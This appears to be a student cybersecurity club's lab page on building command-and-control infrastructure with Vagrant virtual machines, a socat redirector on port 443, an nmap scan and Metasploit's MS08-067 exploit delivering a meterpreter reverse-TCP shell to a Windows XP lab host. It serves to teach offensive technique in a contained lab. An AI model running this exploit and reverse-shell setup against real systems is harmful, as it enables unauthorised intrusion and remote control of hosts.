49th Security Division
We are a student organization that are about promoting the knowledge of cybersecurity and teaching our members fundamentals (along with advanced techniques) on how to prepare for the future of cybersecurity!
wget https://raw.githubusercontent.com/49thSecurityDivision/slideshows/master/2017/01-Intermediate-Monday/08-C2-Infra/Vagrantfile -O Vagrantfile
curl https://raw.githubusercontent.com/49thSecurityDivision/slideshows/master/2017/01-Intermediate-Monday/08-C2-Infra/Vagrantfile -o Vagrantfile
wget https://raw.githubusercontent.com/49thSecurityDivision/slideshows/master/2017/01-Intermediate-Monday/08-C2-Infra/Vagrantfile
vagrant up
vagrant ssh winxp
vagrant ssh redir
sudo socat TCP4-LISTEN:443,fork TCP4:
vagrant global-status
vagrant ssh kali
nmap -sT -O -oA initial-network
use exploit/windows/smb/ms08_067_netapi
set payload windows/meterpreter/reverse_tcp # This is the payload I set
show options # This shows all the options for the payload and exploit
set RHOST # The host you are attacking
set LHOST # The external IP that the payload should connect to
set LPORT 443 # External port that the payload will connect to
set ReverseListenerBindAddress # The internal IP address of the kali box that's being NAT'd
set ReverseListenerBindPort 443
set ExitOnSession false # Don't stop the handler once a session is established (allows you to receive multiple sessions for a handler)
exploit -j -z # Start the exploit as a job. Do not automatically interact with new sessions.
## after you have your session do this to see and interact with it.
sessions -l
# connect to whatever your session number is that displays below
sessions -i 1
# to interact with your exploited host
# to show that the metasploit module isn't connected to your machine
By 49th Security Division
We are a student organization that are about promoting the knowledge of cybersecurity and teaching our members fundamentals (along with advanced techniques) on how to prepare for the future of cybersecurity!